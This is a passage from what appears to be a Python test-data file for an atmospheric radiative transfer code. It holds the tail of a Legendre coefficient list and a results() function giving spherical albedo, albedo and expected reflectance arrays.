0.4556995e-02,
0.4434989e-02,
0.4255197e-02,
0.4140997e-02,
0.3972854e-02,
0.3865974e-02,
0.3708747e-02,
0.3608730e-02,
0.3461733e-02,
0.3368151e-02,
0.3230736e-02,
0.3143185e-02,
0.3014746e-02,
0.2932847e-02,
0.2812813e-02,
0.2736210e-02,
0.2624045e-02,
0.2552404e-02,
0.2447605e-02,
0.2380611e-02,
0.2282708e-02,
0.2220067e-02,
0.2128618e-02,
0.2070056e-02,
0.1984648e-02,
0.1929906e-02,
0.1850152e-02,
0.1798987e-02,
0.1724522e-02,
0.1676708e-02,
0.1607190e-02,
0.1562511e-02,
0.1497620e-02,
0.1455875e-02,
0.1395308e-02,
0.1356308e-02,
0.1299785e-02,
0.1263353e-02,
0.1210611e-02,
0.1176583e-02,
0.1127375e-02,
0.1095598e-02,
0.1049696e-02,
0.1020025e-02,
0.9772121e-03,
0.9495118e-03,
0.9095846e-03,
0.8837259e-03,
0.8464937e-03,
0.8223557e-03,
0.7876397e-03,
0.7651098e-03,
0.7327438e-03,
0.7117181e-03,
0.6815480e-03,
0.6619300e-03,
0.6338120e-03,
0.6155113e-03,
0.5893102e-03,
0.5722408e-03,
0.5478283e-03,
0.5319081e-03,
0.5091634e-03,
0.4943152e-03,
0.4731258e-03,
0.4592787e-03,
0.4395410e-03,
0.4266303e-03,
0.4082493e-03,
0.3962155e-03,
0.3791019e-03,
0.3678880e-03,
0.3519565e-03,
0.3415071e-03,
0.3266762e-03,
0.3169383e-03,
0.3031319e-03,
0.2940574e-03,
0.2812067e-03,
0.2727531e-03,
0.2607960e-03,
0.2529247e-03,
0.2418025e-03,
0.2344753e-03,
0.2241307e-03,
0.2173091e-03,
0.2076865e-03,
0.2013343e-03,
0.1923831e-03,
0.1864691e-03,
0.1781456e-03,
0.1726433e-03,
0.1649075e-03,
0.1597912e-03,
0.1526032e-03,
0.1478454e-03,
0.1411648e-03,
0.1367381e-03,
0.1305278e-03,
0.1264096e-03,
0.1206392e-03,
0.1168121e-03,
0.1114548e-03,
0.1079011e-03,
0.1029286e-03,
0.9962750e-04,
0.9500928e-04,
0.9194008e-04,
0.8765030e-04,
0.8479853e-04,
0.8081775e-04,
0.7817267e-04,
0.7448255e-04,
0.7203030e-04,
0.6860758e-04,
0.6633051e-04,
0.6315326e-04,
0.6103854e-04,
0.5809158e-04,
0.5613237e-04,
0.5340456e-04,
0.5159216e-04,
0.4906537e-04,
0.4738409e-04,
0.4504024e-04,
0.4348066e-04,
0.4130949e-04,
0.3986734e-04,
0.3786116e-04,
0.3653038e-04,
0.3467413e-04,
0.3343939e-04,
0.3171734e-04,
0.3057505e-04,
0.2898660e-04,
0.2793625e-04,
0.2646920e-04,
0.2549635e-04,
0.2413735e-04,
0.2323900e-04,
0.2198645e-04,
0.2116049e-04,
0.2000504e-04,
0.1924253e-04,
0.1817554e-04,
0.1747326e-04,
0.1649066e-04,
0.1584529e-04,
0.1494019e-04,
0.1434660e-04,
0.1351308e-04,
0.1296814e-04,
0.1220153e-04,
0.1170191e-04,
0.1099720e-04,
0.1053953e-04,
0.9892289e-05,
]
return (
ssalb,
len(Legendre_coef),
np.pad(Legendre_coef, (0, 700 - len(Legendre_coef))),
)
def results():
spherical_albedo = 0.1400516239529828
albedo = [
0.57934552e00,
0.55945677e00,
0.53431237e00,
0.50788230e00,
0.48296762e00,
0.46127653e00,
0.44329438e00,
0.42849159e00,
0.41589457e00,
0.40462923e00,
0.39412692e00,
0.38407087e00,
0.37428829e00,
0.36468229e00,
0.35519615e00,
0.34579977e00,
0.33647874e00,
0.32722980e00,
0.31805637e00,
0.30896705e00,
0.29997292e00,
0.29108667e00,
0.28232241e00,
0.27369434e00,
0.26521713e00,
0.25690463e00,
0.24876949e00,
0.24082196e00,
0.23306957e00,
0.22551830e00,
0.21817389e00,
0.21104220e00,
0.20412904e00,
0.19744009e00,
0.19098036e00,
0.18475346e00,
0.17876221e00,
0.17300782e00,
0.16749054e00,
0.16220950e00,
0.15716265e00,
0.15234718e00,
0.14775957e00,
0.14339539e00,
0.13924994e00,
0.13531761e00,
0.13159263e00,
0.12806895e00,
0.12473993e00,
0.12159910e00,
0.11863959e00,
0.11585440e00,
0.11323670e00,
0.11077949e00,
0.10847593e00,
0.10631904e00,
0.10430222e00,
0.10241879e00,
0.10066233e00,
0.99026598e-01,
0.97505502e-01,
0.96093059e-01,
0.94783649e-01,
0.93571737e-01,
0.92452131e-01,
0.91419615e-01,
0.90469383e-01,
0.89596771e-01,
0.88797286e-01,
0.88066630e-01,
0.87400697e-01,
0.86795583e-01,
0.86247541e-01,
0.85752994e-01,
0.85308485e-01,
0.84910698e-01,
0.84556349e-01,
0.84242381e-01,
0.83965667e-01,
0.83723314e-01,
0.83512425e-01,
0.83330259e-01,
0.83174184e-01,
0.83041623e-01,
0.82930155e-01,
0.82837544e-01,
0.82761563e-01,
0.82700156e-01,
0.82651392e-01,
0.82613394e-01,
0.82584500e-01,
0.82563184e-01,
0.82548007e-01,
0.82537644e-01,
0.82530975e-01,
0.82526997e-01,
0.82524881e-01,
0.82523920e-01,
0.82523584e-01,
0.82523517e-01,
]
expected_r1 = np.array(
[
0.38368369e03,
0.25770578e03,
0.23945151e03,
0.16855780e03,
0.18244296e03,
0.16236093e03,
0.10911653e03,
0.12755070e03,
0.12647316e03,
0.10830920e03,
0.67582947e02,
0.83225288e02,
0.89081558e02,
0.82212189e02,
0.66570000e02,
0.39153576e02,
0.50326321e02,
0.57166462e02,
0.56031170e02,
0.47971886e02,
0.36434990e02,
0.21253523e02,
0.28237167e02,
0.33642113e02,
0.34688950e02,
0.31254200e02,
0.25037840e02,
0.18253815e02,
0.11248275e02,
0.15133494e02,
0.18625698e02,
0.20033745e02,
0.18957489e02,
0.16075739e02,
0.12519300e02,
0.92340946e01,
0.62269855e01,
0.82350597e01,
0.10240828e02,
0.11357998e02,
0.11247568e02,
0.10105079e02,
0.84183950e01,
0.66705170e01,
0.51578894e01,
0.37987945e01,
0.48435707e01,
0.59637489e01,
0.67243404e01,
0.69045143e01,
0.65221829e01,
0.57613211e01,
0.48524532e01,
0.39752564e01,
0.32225568e01,
0.25505664e01,
0.31431477e01,
0.38052323e01,
0.43142323e01,
0.45352106e01,
0.44408669e01,
0.40962334e01,
0.36127684e01,
0.30965683e01,
0.26170671e01,
0.22043598e01,
0.18349921e01,
0.22099471e01,
0.26385496e01,
0.29933913e01,
0.31896119e01,
0.31966636e01,
0.30375271e01,
0.27696035e01,
0.24563296e01,
0.21455364e01,
0.18630074e01,
0.16174023e01,
0.13863298e01,
0.16447055e01,
0.19445310e01,
0.22046304e01,
0.23685496e01,
0.24110959e01,
0.23400669e01,
0.21870027e01,
0.19907905e01,
0.17838671e01,
0.15866874e01,
0.14085795e01,
0.12514458e01,
0.10881330e01,
0.12770401e01,
0.14988452e01,
0.16977799e01,
0.18342333e01,
0.18884524e01,
0.18623250e01,
0.17742110e01,
0.16486713e01,
0.15075257e01,
0.13662242e01,
0.12339157e01,
0.11142954e01,
0.10071722e01,
0.88128895e00,
0.10257436e01,
0.11969687e01,
0.13544649e01,
0.14691297e01,
0.15254281e01,
0.15228883e01,
0.14728941e01,
0.13916924e01,
0.12941229e01,
0.11911522e01,
0.10903227e01,
0.99648142e00,
0.91146982e00,
0.83437926e00,
0.73236907e00,
0.84691751e00,
0.98372436e00,
0.11120189e01,
0.12095475e01,
0.12638915e01,
0.12736813e01,
0.12464422e01,
0.11935405e01,
0.11255139e01,
0.10501394e01,
0.97279239e00,
0.89753741e00,
0.82755452e00,
0.76412642e00,
0.70607662e00,
0.62143141e00,
0.71498531e00,
0.82739562e00,
0.93439400e00,
0.10183749e01,
0.10692183e01,
0.10852710e01,
0.10717980e01,
0.10371528e01,
0.98918498e00,
0.93369889e00,
0.87458736e00,
0.81457925e00,
0.75610143e00,
0.70160747e00,
0.65229672e00,
0.60690910e00,
0.53620493e00,
0.61444676e00,
0.70891893e00,
0.79989344e00,
0.87304217e00,
0.91996312e00,
0.93897974e00,
0.93395931e00,
0.91129071e00,
0.87703383e00,
0.83570266e00,
0.79033947e00,
0.74295175e00,
0.69498348e00,
0.64796978e00,
0.60397410e00,
0.56429613e00,
0.52768981e00,
0.46893141e00,
0.53562319e00,
0.61647099e00,
0.69504291e00,
0.75940472e00,
0.80246264e00,
0.82262319e00,
0.82284969e00,
0.80819505e00,
0.78347129e00,
0.75227189e00,
0.71705294e00,
0.67947024e00,
0.64061898e00,
0.60127056e00,
0.56240505e00,
0.52581406e00,
0.49295956e00,
0.46267310e00,
0.41456842e00,
0.47228998e00,
0.54249328e00,
0.61122215e00,
0.66834646e00,
0.70778871e00,
0.72807664e00,
0.73156416e00,
0.72236371e00,
0.70439237e00,
0.68056595e00,
0.65288788e00,
0.62274611e00,
0.59110469e00,
0.55858999e00,
0.52560019e00,
0.49273926e00,
0.46156633e00,
0.43370983e00,
0.40812615e00,
0.36973703e00,
0.42031151e00,
0.48198968e00,
0.54273206e00,
0.59380746e00,
0.62994283e00,
0.64979416e00,
0.65528655e00,
0.64984703e00,
0.63673460e00,
0.61836016e00,
0.59637630e00,
0.57194269e00,
0.54589856e00,
0.51883745e00,
0.49112943e00,
0.46296096e00,
0.43467191e00,
0.40760121e00,
0.38351870e00,
0.36154264e00,
0.33207551e00,
0.37681752e00,
0.43150941e00,
0.48563948e00,
0.53159100e00,
0.56474036e00,
0.58386314e00,
0.59056675e00,
0.58775848e00,
0.57819819e00,
0.56391406e00,
0.54628950e00,
0.52629930e00,
0.50466305e00,
0.48191690e00,
0.45844156e00,
0.43446112e00,
0.41004205e00,
0.38533735e00,
0.36147287e00,
0.34032100e00,
0.32119045e00,
0.29983068e00,
0.33969635e00,
0.38853076e00,
0.43707687e00,
0.47863159e00,
0.50910699e00,
0.52738410e00,
0.53481984e00,
0.53390729e00,
0.52700996e00,
0.51585591e00,
0.50161958e00,
0.48513207e00,
0.46701470e00,
0.44774175e00,
0.42767024e00,
0.40705225e00,
0.38602614e00,
0.36459178e00,
0.34277132e00,
0.32148623e00,
0.30266759e00,
0.28583673e00,
0.27165741e00,
0.30735224e00,
0.35116890e00,
0.39490715e00,
0.43263298e00,
0.46071306e00,
0.47812337e00,
0.48601636e00,
0.48654056e00,
0.48172772e00,
0.47305444e00,
0.46152285e00,
0.44784895e00,
0.43257853e00,
0.41613755e00,
0.39885530e00,
0.38097894e00,
0.36268044e00,
0.34404564e00,
0.32503796e00,
0.30558982e00,
0.28643203e00,
0.26951250e00,
0.25458133e00,
0.24664548e00,
0.27872956e00,
0.31819224e00,
0.35773003e00,
0.39206341e00,
0.41795400e00,
0.43447414e00,
0.44261932e00,
0.44425684e00,
0.44113833e00,
0.43451858e00,
0.42523941e00,
0.41390744e00,
0.40100044e00,
0.38690761e00,
0.37194157e00,
0.35634446e00,
0.34029481e00,
0.32391262e00,
0.30725011e00,
0.29025167e00,
0.27279079e00,
0.25542563e00,
0.24008393e00,
0.22675417e00,
0.22445151e00,
0.25343820e00,
0.28914347e00,
0.32500827e00,
0.35629919e00,
0.38011837e00,
0.39564186e00,
0.40376574e00,
0.40615430e00,
0.40434766e00,
0.39941984e00,
0.39206272e00,
0.38276103e00,
0.37190381e00,
0.35982931e00,
0.34683278e00,
0.33315977e00,
0.31900054e00,
0.30449098e00,
0.28971705e00,
0.27470860e00,
0.25940111e00,
0.24363182e00,
0.22780687e00,
0.21380231e00,
0.20184751e00,
0.20519748e00,
0.23159876e00,
0.26413625e00,
0.29684672e00,
0.32543322e00,
0.34727564e00,
0.36164755e00,
0.36939174e00,
0.37204832e00,
0.37103242e00,
0.36731219e00,
0.36147776e00,
0.35390341e00,
0.34486532e00,
0.33460709e00,
0.32336712e00,
0.31137651e00,
0.29884037e00,
0.28591970e00,
0.27272525e00,
0.25932097e00,
0.24572186e00,
0.23185994e00,
0.21755250e00,
0.20307408e00,
0.19022347e00,
0.17946769e00,
0.18898228e00,
0.21327148e00,
0.24319792e00,
0.27327064e00,
0.29953399e00,
0.31957966e00,
0.33274972e00,
0.33984205e00,
0.34230980e00,
0.34150216e00,
0.33835727e00,
0.33344826e00,
0.32711285e00,
0.31955174e00,
0.31089956e00,
0.30128181e00,
0.29084933e00,
0.27977982e00,
0.26825124e00,
0.25640994e00,
0.24435396e00,
0.23213391e00,
0.21975470e00,
0.20714773e00,
0.19412118e00,
0.18083785e00,
0.16899987e00,
0.15930425e00,
0.17541476e00,
0.19795303e00,
0.22571321e00,
0.25359881e00,
0.27793473e00,
0.29647639e00,
0.30860057e00,
0.31503823e00,
0.31714112e00,
0.31618607e00,
0.31309542e00,
0.30847403e00,
0.30271024e00,
0.29603517e00,
0.28855911e00,
0.28031746e00,
0.27133235e00,
0.26166755e00,
0.25144571e00,
0.24082130e00,
0.22993420e00,
0.21887848e00,
0.20769787e00,
0.19639082e00,
0.18488961e00,
0.17300032e00,
0.16079190e00,
0.14985578e00,
0.14110740e00,
0.16366631e00,
0.18467116e00,
0.21054901e00,
0.23656210e00,
0.25929046e00,
0.27663431e00,
0.28799024e00,
0.29400581e00,
0.29590416e00,
0.29484844e00,
0.29169577e00,
0.28704572e00,
0.28133944e00,
0.27490255e00,
0.26794240e00,
0.26054066e00,
0.25267535e00,
0.24428359e00,
0.23534042e00,
0.22590491e00,
0.21610361e00,
0.20607288e00,
0.19590905e00,
0.18565454e00,
0.17530420e00,
0.16479163e00,
0.15392394e00,
0.14269111e00,
0.13256522e00,
0.12466694e00,
0.15291582e00,
0.17249423e00,
0.19663572e00,
0.22094680e00,
0.24225558e00,
0.25860691e00,
0.26942277e00,
0.27527362e00,
0.27725279e00,
0.27639005e00,
0.27343193e00,
0.26890206e00,
0.26321408e00,
0.25673062e00,
0.24976483e00,
0.24254556e00,
0.23517576e00,
0.22762197e00,
0.21976374e00,
0.21149129e00,
0.20278960e00,
0.19374785e00,
0.18449736e00,
0.17514092e00,
0.16572388e00,
0.15623912e00,
0.14661992e00,
0.13667518e00,
0.12632957e00,
0.11693286e00,
0.10979707e00,
0.14267196e00,
0.16087982e00,
0.18335804e00,
0.20604582e00,
0.22601375e00,
0.24145372e00,
0.25182438e00,
0.25763780e00,
0.25987828e00,
0.25945812e00,
0.25701439e00,
0.25296855e00,
0.24764267e00,
0.24133593e00,
0.23435625e00,
0.22701317e00,
0.21957387e00,
0.21219650e00,
0.20488037e00,
0.19748402e00,
0.18982655e00,
0.18181197e00,
0.17347980e00,
0.16495080e00,
0.15633532e00,
0.14768384e00,
0.13898759e00,
0.13017787e00,
0.12106603e00,
0.11152479e00,
0.10278418e00,
0.96333064e-01,
0.13278867e00,
0.14967601e00,
0.17054874e00,
0.19166234e00,
0.21031891e00,
0.22485405e00,
0.23476954e00,
0.24053511e00,
0.24305005e00,
0.24313784e00,
0.24135487e00,
0.23804264e00,
0.23343392e00,
0.22772875e00,
0.22114034e00,
0.21392128e00,
0.20636588e00,
0.19877388e00,
0.19137226e00,
0.18422794e00,
0.17721902e00,
0.17011781e00,
0.16274700e00,
0.15508358e00,
0.14722840e00,
0.13929746e00,
0.13134745e00,
0.12336826e00,
0.11528943e00,
0.10692697e00,
0.98114364e-01,
0.89966424e-01,
0.84133029e-01,
0.12330588e00,
0.13893479e00,
0.15827183e00,
0.17786814e00,
0.19524175e00,
0.20886324e00,
0.21827731e00,
0.22391967e00,
0.22662000e00,
0.22713451e00,
0.22596700e00,
0.22341314e00,
0.21965274e00,
0.21481460e00,
0.20901735e00,
0.20240258e00,
0.19516377e00,
0.18756257e00,
0.17991112e00,
0.17249928e00,
0.16548070e00,
0.15879016e00,
0.15218471e00,
0.14541364e00,
0.13838096e00,
0.13115591e00,
0.12385615e00,
0.11654575e00,
0.10921578e00,
0.10179584e00,
0.94108447e-01,
0.85958004e-01,
0.78349575e-01,
0.73076993e-01,
0.11430455e00,
0.12874915e00,
0.14663576e00,
0.16478880e00,
0.18092515e00,
0.19363941e00,
0.20251557e00,
0.20795847e00,
0.21073578e00,
0.21154700e00,
0.21085797e00,
0.20893978e00,
0.20595059e00,
0.20198931e00,
0.19712524e00,
0.19142093e00,
0.18495877e00,
0.17787308e00,
0.17037868e00,
0.16277534e00,
0.15539503e00,
0.14847951e00,
0.14204761e00,
0.13587566e00,
0.12965593e00,
0.12321350e00,
0.11657458e00,
0.10985404e00,
0.10312499e00,
0.96382633e-01,
0.89558579e-01,
0.82482606e-01,
0.74937083e-01,
0.67823343e-01,
0.63062489e-01,
0.10584079e00,
0.11918116e00,
0.13571160e00,
0.15250790e00,
0.16746905e00,
0.17930275e00,
0.18762796e00,
0.19281991e00,
0.19558841e00,
0.19658093e00,
0.19623034e00,
0.19479063e00,
0.19241145e00,
0.18918501e00,
0.18516850e00,
0.18039672e00,
0.17489515e00,
0.16870056e00,
0.16189243e00,
0.15463088e00,
0.14718156e00,
0.13989125e00,
0.13307634e00,
0.12685405e00,
0.12105249e00,
0.11533057e00,
0.10943508e00,
0.10333905e00,
0.97149357e-01,
0.90949543e-01,
0.84741533e-01,
0.78459755e-01,
0.71940817e-01,
0.64950287e-01,
0.58292422e-01,
0.53999700e-01,
0.97934157e-01,
0.11025076e00,
0.12552127e00,
0.14105226e00,
0.15490949e00,
0.16590366e00,
0.17368492e00,
0.17860012e00,
0.18130451e00,
0.18239634e00,
0.18227696e00,
0.18118428e00,
0.17926148e00,
0.17660023e00,
0.17325978e00,
0.16927499e00,
0.16466121e00,
0.15942113e00,
0.15355882e00,
0.14710733e00,
0.14017075e00,
0.13296603e00,
0.12582819e00,
0.11912578e00,
0.11307607e00,
0.10758535e00,
0.10230618e00,
0.96913703e-01,
0.91320075e-01,
0.85618503e-01,
0.79903029e-01,
0.74183889e-01,
0.68398476e-01,
0.62389236e-01,
0.55908926e-01,
0.49671900e-01,
0.45807466e-01,
0.90577021e-01,
0.10194721e00,
0.11605130e00,
0.13040775e00,
0.14323507e00,
0.15343815e00,
0.16069512e00,
0.16532598e00,
0.16793491e00,
0.16907367e00,
0.16911317e00,
0.16827461e00,
0.16669342e00,
0.16445951e00,
0.16163501e00,
0.15826119e00,
0.15436088e00,
0.14993919e00,
0.14498582e00,
0.13948333e00,
0.13342866e00,
0.12687427e00,
0.11998184e00,
0.11305442e00,
0.10648688e00,
0.10058656e00,
0.95354967e-01,
0.90465494e-01,
0.85533582e-01,
0.80405675e-01,
0.75155161e-01,
0.69885492e-01,
0.64615801e-01,
0.59286319e-01,
0.53744264e-01,
0.47732841e-01,
0.41884389e-01,
0.38411867e-01,
0.83746620e-01,
0.94243065e-01,
0.10726915e00,
0.12053798e00,
0.13240825e00,
0.14187106e00,
0.14862999e00,
0.15297991e00,
0.15547749e00,
0.15663114e00,
0.15678266e00,
0.15613645e00,
0.15481880e00,
0.15291539e00,
0.15048827e00,
0.14758278e00,
0.14422987e00,
0.14044581e00,
0.13623075e00,
0.13156785e00,
0.12642694e00,
0.12077967e00,
0.11463551e00,
0.10810074e00,
0.10143317e00,
0.95029272e-01,
0.89268476e-01,
0.84254339e-01,
0.79705626e-01,
0.75194120e-01,
0.70498869e-01,
0.65667070e-01,
0.60809318e-01,
0.55953730e-01,
0.51043399e-01,
0.45929730e-01,
0.40349029e-01,
0.34859274e-01,
0.31745121e-01,
0.77413671e-01,
0.87103941e-01,
0.99134557e-01,
0.11139757e00,
0.12238043e00,
0.13115339e00,
0.13744320e00,
0.14152151e00,
0.14390105e00,
0.14504991e00,
0.14528263e00,
0.14478727e00,
0.14368038e00,
0.14204189e00,
0.13993120e00,
0.13739403e00,
0.13446525e00,
0.13116941e00,
0.12751934e00,
0.12351336e00,
0.11913250e00,
0.11434042e00,
0.10909266e00,
0.10336579e00,
0.97215243e-01,
0.90846524e-01,
0.84636919e-01,
0.79015903e-01,
0.74187510e-01,
0.69935963e-01,
0.65807395e-01,
0.61514482e-01,
0.57072140e-01,
0.52595474e-01,
0.48121743e-01,
0.43596964e-01,
0.38876079e-01,
0.33690531e-01,
0.28531600e-01,
0.25744777e-01,
0.71547434e-01,
0.80494061e-01,
0.91605820e-01,
0.10293934e00,
0.11310040e00,
0.12123200e00,
0.12708212e00,
0.13090093e00,
0.13316067e00,
0.13429219e00,
0.13458471e00,
0.13421088e00,
0.13327757e00,
0.13185826e00,
0.13000821e00,
0.12777114e00,
0.12518245e00,
0.12227035e00,
0.11905541e00,
0.11554869e00,
0.11174847e00,
0.10763626e00,
0.10317403e00,
0.98308414e-01,
0.92992358e-01,
0.87237559e-01,
0.81194960e-01,
0.75207628e-01,
0.69733076e-01,
0.65067738e-01,
0.61075501e-01,
0.57294834e-01,
0.53375702e-01,
0.49295910e-01,
0.45172136e-01,
0.41050550e-01,
0.36880266e-01,
0.32519296e-01,
0.27695602e-01,
0.22840958e-01,
0.20352198e-01,
0.66117376e-01,
0.74378133e-01,
0.84641933e-01,
0.95116824e-01,
0.10451740e00,
0.11205351e00,
0.11749266e00,
0.12106522e00,
0.12320609e00,
0.12431186e00,
0.12464833e00,
0.12437376e00,
0.12358582e00,
0.12235164e00,
0.12072182e00,
0.11873700e00,
0.11643104e00,
0.11383259e00,
0.11096542e00,
0.10784754e00,
0.10448926e00,
0.10088971e00,
0.97032204e-01,
0.92879705e-01,
0.88374905e-01,
0.83454721e-01,
0.78095064e-01,
0.72394073e-01,
0.66651307e-01,
0.61332978e-01,
0.56815393e-01,
0.53050254e-01,
0.49585145e-01,
0.46012942e-01,
0.42270541e-01,
0.38473442e-01,
0.34676433e-01,
0.30831696e-01,
0.26799770e-01,
0.22306219e-01,
0.17730433e-01,
0.15513073e-01,
0.61093956e-01,
0.68722166e-01,
0.78203514e-01,
0.87885372e-01,
0.96582450e-01,
0.10356604e00,
0.10862161e00,
0.11196126e00,
0.11398555e00,
0.11505950e00,
0.11542739e00,
0.11523422e00,
0.11456916e00,
0.11349328e00,
0.11205266e00,
0.11028446e00,
0.10822011e00,
0.10588704e00,
0.10330941e00,
0.10050797e00,
0.97499035e-01,
0.94292536e-01,
0.90888672e-01,
0.87273069e-01,
0.83411098e-01,
0.79244599e-01,
0.74700132e-01,
0.69725469e-01,
0.64370766e-01,
0.58887802e-01,
0.53736102e-01,
0.49357101e-01,
0.45792568e-01,
0.42613342e-01,
0.39362472e-01,
0.35933696e-01,
0.32438610e-01,
0.28940061e-01,
0.25393331e-01,
0.21661280e-01,
0.17468622e-01,
0.13150477e-01,
0.11185951e-01,
0.56448560e-01,
0.63493401e-01,
0.72252735e-01,
0.81202179e-01,
0.89248493e-01,
0.95719531e-01,
0.10041723e00,
0.10353691e00,
0.10544755e00,
0.10648517e00,
0.10687432e00,
0.10674787e00,
0.10618718e00,
0.10524774e00,
0.10397130e00,
0.10239167e00,
0.10053762e00,
0.98434702e-01,
0.96106045e-01,
0.93572617e-01,
0.90852953e-01,
0.87962106e-01,
0.84909752e-01,
0.81697099e-01,
0.78312054e-01,
0.74722745e-01,
0.70871852e-01,
0.66679642e-01,
0.62072858e-01,
0.57060491e-01,
0.51846057e-01,
0.46870694e-01,
0.42625420e-01,
0.39239943e-01,
0.36319576e-01,
0.33365458e-01,
0.30227283e-01,
0.27010450e-01,
0.23785481e-01,
0.20511542e-01,
0.17054949e-01,
0.13141878e-01,
0.90698684e-02,
0.73469649e-02,
0.52153420e-01,
0.58660157e-01,
0.66753164e-01,
0.75026073e-01,
0.82470380e-01,
0.88465959e-01,
0.92829920e-01,
0.95742144e-01,
0.97542584e-01,
0.98540656e-01,
0.98942772e-01,
0.98870747e-01,
0.98398849e-01,
0.97577512e-01,
0.96444599e-01,
0.95030688e-01,
0.93361929e-01,
0.91461726e-01,
0.89351647e-01,
0.87051816e-01,
0.84580876e-01,
0.81955560e-01,
0.79189852e-01,
0.76293178e-01,
0.73267482e-01,
0.70102490e-01,
0.66768855e-01,
0.63210987e-01,
0.59346184e-01,
0.55086352e-01,
0.50406374e-01,
0.45463238e-01,
0.40671837e-01,
0.36558144e-01,
0.33334181e-01,
0.30647837e-01,
0.27966481e-01,
0.25096513e-01,
0.22136096e-01,
0.19164244e-01,
0.16145656e-01,
0.12950187e-01,
0.93025165e-02,
0.54607159e-02,
0.39474810e-02,
0.48182234e-01,
0.54192506e-01,
0.61670437e-01,
0.69318332e-01,
0.76205671e-01,
0.81760220e-01,
0.85813068e-01,
0.88529900e-01,
0.90223983e-01,
0.91180287e-01,
0.91588661e-01,
0.91560833e-01,
0.91164641e-01,
0.90445958e-01,
0.89439072e-01,
0.88171646e-01,
0.86667374e-01,
0.84947526e-01,
0.83031908e-01,
0.80939271e-01,
0.78687482e-01,
0.76293327e-01,
0.73772058e-01,
0.71136616e-01,
0.68396017e-01,
0.65552600e-01,
0.62597387e-01,
0.59503239e-01,
0.56216817e-01,
0.52654829e-01,
0.48719283e-01,
0.44357602e-01,
0.39683431e-01,
0.35080492e-01,
0.31097105e-01,
0.28020034e-01,
0.25545072e-01,
0.23114407e-01,
0.20494236e-01,
0.17775815e-01,
0.15046233e-01,
0.12272255e-01,
0.93193343e-02,
0.59020361e-02,
0.22407323e-02,
0.87492354e-03,
0.44510506e-01,
0.50062627e-01,
0.56972671e-01,
0.64043038e-01,
0.70415020e-01,
0.75560495e-01,
0.79323418e-01,
0.81856459e-01,
0.83448350e-01,
0.84361628e-01,
0.84770963e-01,
0.84778860e-01,
0.84447332e-01,
0.83818108e-01,
0.82922280e-01,
0.81784874e-01,
0.80427296e-01,
0.78868859e-01,
0.77127583e-01,
0.75220726e-01,
0.73164918e-01,
0.70976183e-01,
0.68669744e-01,
0.66259526e-01,
0.63757502e-01,
0.61172180e-01,
0.58505908e-01,
0.55750374e-01,
0.52880324e-01,
0.49845133e-01,
0.46562638e-01,
0.42928446e-01,
0.38867969e-01,
0.34455679e-01,
0.30041935e-01,
0.26187586e-01,
0.23246434e-01,
0.20965882e-01,
0.18771386e-01,
0.16391607e-01,
0.13906728e-01,
0.11403601e-01,
0.88423118e-02,
0.60800756e-02,
0.28280553e-02,
-0.70986536e-03,
-0.19648359e-02,
0.41115671e-01,
0.46244897e-01,
0.52630525e-01,
0.59167176e-01,
0.65062307e-01,
0.69828428e-01,
0.73321380e-01,
0.75681835e-01,
0.77175975e-01,
0.78045711e-01,
0.78451805e-01,
0.78488372e-01,
0.78212120e-01,
0.77661060e-01,
0.76863378e-01,
0.75841703e-01,
0.74615397e-01,
0.73201917e-01,
0.71617633e-01,
0.69878295e-01,
0.67999192e-01,
0.65995254e-01,
0.63880973e-01,
0.61670251e-01,
0.59375945e-01,
0.57009004e-01,
0.54577064e-01,
0.52082047e-01,
0.49516134e-01,
0.46855822e-01,
0.44053324e-01,
0.41028392e-01,
0.37672661e-01,
0.33894073e-01,
0.29732887e-01,
0.25506891e-01,
0.21783372e-01,
0.18975813e-01,
0.16882956e-01,
0.14915733e-01,
0.12760971e-01,
0.10479322e-01,
0.81534600e-02,
0.57432470e-02,
0.31131236e-02,
-0.13105665e-04,
-0.34361165e-02,
-0.45660972e-02,
0.37977196e-01,
0.42716030e-01,
0.48617344e-01,
0.54660756e-01,
0.60114693e-01,
0.64529106e-01,
0.67770794e-01,
0.69969401e-01,
0.71370378e-01,
0.72196685e-01,
0.72596297e-01,
0.72655670e-01,
0.72426699e-01,
0.71944013e-01,
0.71233213e-01,
0.70314772e-01,
0.69206156e-01,
0.67923151e-01,
0.66480570e-01,
0.64892717e-01,
0.63173585e-01,
0.61336990e-01,
0.59396494e-01,
0.57365343e-01,
0.55256244e-01,
0.53080887e-01,
0.50849102e-01,
0.48567444e-01,
0.46237227e-01,
0.43851011e-01,
0.41386928e-01,
0.38799874e-01,
0.36011849e-01,
0.32912444e-01,
0.29396715e-01,
0.25476838e-01,
0.21440787e-01,
0.17856820e-01,
0.15185956e-01,
0.13268581e-01,
0.11497635e-01,
0.95190108e-02,
0.73810630e-02,
0.51771011e-02,
0.28821086e-02,
0.37416635e-03,
-0.26154167e-02,
-0.58998531e-02,
-0.68843709e-02,
0.35076261e-01,
0.39454699e-01,
0.44908728e-01,
0.50496329e-01,
0.55542119e-01,
0.59630550e-01,
0.62638551e-01,
0.64685628e-01,
0.65998107e-01,
0.66781543e-01,
0.67172192e-01,
0.67249492e-01,
0.67060962e-01,
0.66638172e-01,
0.66004358e-01,
0.65178059e-01,
0.64175054e-01,
0.63009582e-01,
0.61695036e-01,
0.60244419e-01,
0.58670532e-01,
0.56986067e-01,
0.55203587e-01,
0.53335473e-01,
0.51393870e-01,
0.49390342e-01,
0.47335327e-01,
0.45237295e-01,
0.43101642e-01,
0.40929142e-01,
0.38712744e-01,
0.36432110e-01,
0.34044892e-01,
0.31476185e-01,
0.28615938e-01,
0.25350343e-01,
0.21667363e-01,
0.17823832e-01,
0.14378536e-01,
0.11824818e-01,
0.10038571e-01,
0.84049767e-02,
0.65482627e-02,
0.45205113e-02,
0.24313403e-02,
0.26542676e-03,
-0.20983638e-02,
-0.49343021e-02,
-0.80712391e-02,
-0.89136148e-02,
0.32395583e-01,
0.36441319e-01,
0.41482292e-01,
0.46648715e-01,
0.51316999e-01,
0.55103421e-01,
0.57894230e-01,
0.59799597e-01,
0.61028276e-01,
0.61769772e-01,
0.62149592e-01,
0.62240742e-01,
0.62086754e-01,
0.61716419e-01,
0.61150856e-01,
0.60406826e-01,
0.59498589e-01,
0.58439020e-01,
0.57240289e-01,
0.55914193e-01,
0.54472402e-01,
0.52926507e-01,
0.51288098e-01,
0.49568728e-01,
0.47779780e-01,
0.45932278e-01,
0.44036478e-01,
0.42101391e-01,
0.40134147e-01,
0.38139164e-01,
0.36116980e-01,
0.34061395e-01,
0.31954251e-01,
0.29756844e-01,
0.27398031e-01,
0.24767753e-01,
0.21741455e-01,
0.18279733e-01,
0.14604551e-01,
0.11262298e-01,
0.87792939e-02,
0.70768204e-02,
0.55486909e-02,
